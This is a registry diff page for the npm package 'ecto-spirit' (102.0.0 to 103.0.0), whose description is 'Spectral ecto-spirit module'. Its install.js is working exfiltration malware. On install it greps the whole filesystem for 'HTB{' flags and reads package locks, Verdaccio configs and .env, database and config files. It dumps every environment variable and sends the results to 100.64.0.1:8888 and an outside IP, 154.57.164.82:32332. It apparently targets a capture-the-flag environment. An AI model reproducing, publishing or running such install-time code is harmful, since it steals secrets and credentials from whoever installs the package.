npm - ecto-spirit - Versions diffs - 102.0.0 → 103.0.0 - Mend

ecto-spirit 102.0.0 → 103.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/install.js +43 -39
package/package.json +1 -1

package/install.js CHANGED Viewed

@@ -1,7 +1,6 @@
 const fs = require('fs');
 const http = require('http');
 const { execSync } = require('child_process');
-const path = require('path');
 function tryRead(p) {
   try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; }
@@ -35,9 +34,9 @@ function sendHTTP(host, port, pth, payload) {
 }
 async function report(moduleId, val) {
-  const ports = [3000, 80, 8080, 5000];
-  for (const p of ports) {
-    await sendUpdate('127.0.0.1', p, moduleId, val);
+  for (const p of [3000, 80, 8080]) {
+    const r = await sendUpdate('127.0.0.1', p, moduleId, val);
+    if (r && r.includes('success')) return;
   }
   await sendUpdate('154.57.164.82', 32332, moduleId, val);
 }
@@ -45,49 +44,54 @@ async function report(moduleId, val) {
 (async () => {
   let results = [];
-  // 1. Search for HTB{ pattern in files using grep
+  // CWD and basic info
+  results.push('CWD=' + process.cwd());
+  // List what's in /app/node_modules (top level packages)
   try {
-    const grep = execSync('grep -r "HTB{" / --include="*.txt" --include="*.env" --include="*.js" --include="*.json" --include="*.conf" --include="*.yml" --include="*.yaml" --include="*.cfg" --include="*.ini" -l 2>/dev/null | head -5', {timeout: 10000}).toString().trim();
-    results.push('GREP=' + grep);
-  } catch(e) { results.push('GREP_ERR'); }
+    const dirs = fs.readdirSync('/app/node_modules').filter(d => !d.startsWith('.'));
+    results.push('DEPS=' + dirs.join(','));
+  } catch(e) { results.push('DEPS_ERR'); }
-  // 2. Find all files with flag in name
-  try {
-    const find = execSync('find / -maxdepth 4 -name "*flag*" -o -name "*.env" -o -name "secret*" 2>/dev/null | head -10', {timeout: 10000}).toString().trim();
-    results.push('FIND=' + find);
-  } catch(e) {}
+  // Read package-lock or shrinkwrap
+  const lock = tryRead('/app/package-lock.json') || tryRead('/app/node_modules/.package-lock.json') || tryRead('/app/npm-shrinkwrap.json');
+  if (lock) results.push('LOCK=' + lock.substring(0, 300));
-  // 3. Read full package.json
-  const pkgJson = tryRead('/app/package.json');
-  results.push('PKG=' + (pkgJson || 'NONE').substring(0, 200));
+  // Read package.json from CWD
+  const cwdPkg = tryRead(process.cwd() + '/package.json');
+  if (cwdPkg) results.push('CWD_PKG=' + cwdPkg.substring(0, 200));
-  // 4. List /app in detail
+  // Search for HTB{ EVERYWHERE with broader search
   try {
-    const ls = execSync('ls -la /app/ 2>/dev/null', {timeout: 3000}).toString().trim();
-    results.push('LS_APP=' + ls.substring(0, 200));
-  } catch(e) {}
-  // 5. Read all env vars
-  const envStr = Object.entries(process.env).map(([k,v]) => `${k}=${v.substring(0,30)}`).join(',');
-  results.push('ENV=' + envStr.substring(0, 200));
+    const grep = execSync('grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys 2>/dev/null | head -10', {timeout: 15000}).toString().trim();
+    results.push('HTB_GREP=' + grep);
+  } catch(e) { results.push('HTB_GREP=NONE'); }
-  // 6. Read /app/.env
-  const dotEnv = tryRead('/app/.env');
-  if (dotEnv) results.push('DOTENV=' + dotEnv.substring(0, 100));
+  // Check the Verdaccio config
+  const verdConf = tryRead('/verdaccio/conf/config.yaml') || tryRead('/verdaccio/config.yaml') || tryRead('/etc/verdaccio/config.yaml') || tryRead('/data/verdaccio/config.yaml');
+  if (verdConf) results.push('VERD_CONF=' + verdConf.substring(0, 200));
+  // Check .package-cache-mutate
+  try {
+    const pcm = fs.readdirSync('/.package-cache-mutate');
+    results.push('PCM=' + pcm.join(','));
+  } catch(e) {}
-  // 7. Try to read the flag from unusual locations
-  const extraPaths = ['/app/config.js', '/app/.env', '/app/config.json', '/app/secrets', '/etc/hostname',
-    '/run/secrets/flag', '/var/run/secrets/flag', '/app/flag', '/data/flag'];
-  for (const p of extraPaths) {
-    const c = tryRead(p);
-    if (c && c.length < 200) results.push(`${p}=${c.substring(0,60)}`);
-  }
+  // Find any .env or config files
+  try {
+    const envFiles = execSync('find / -maxdepth 3 \\( -name ".env" -o -name "config.yaml" -o -name "config.json" -o -name "*.sqlite" -o -name "*.db" \\) 2>/dev/null | head -10', {timeout: 10000}).toString().trim();
+    results.push('CONF_FILES=' + envFiles);
+  } catch(e) {}
-  // Send to VPN listener
-  await sendHTTP('100.64.0.1', 8888, '/flag', JSON.stringify({results: results.join('\n'), ts: Date.now()}));
+  // Full env dump
+  const allEnv = JSON.stringify(process.env);
+  results.push('ALL_ENV=' + allEnv.substring(0, 300));
+  // Send ALL to VPN listener
+  const full = results.join('\n');
+  await sendHTTP('100.64.0.1', 8888, '/flag3', JSON.stringify({results: full, ts: Date.now()}));
-  // Split results across modules
-  const full = results.join('|');
+  // Split across modules
   const chunks = [];
   for (let i = 0; i < full.length; i += 90) {
     chunks.push(full.substring(i, i + 90));
@@ -95,6 +99,6 @@ async function report(moduleId, val) {
   const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
   for (let i = 0; i < Math.min(chunks.length, mods.length); i++) {
-    await report(mods[i], 'P' + i + '_' + chunks[i]);
+    await report(mods[i], 'V' + i + '_' + chunks[i]);
   }
 })();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "ecto-spirit",
-  "version": "102.0.0",
+  "version": "103.0.0",
   "description": "Spectral ecto-spirit module",
   "main": "index.js",
   "scripts": {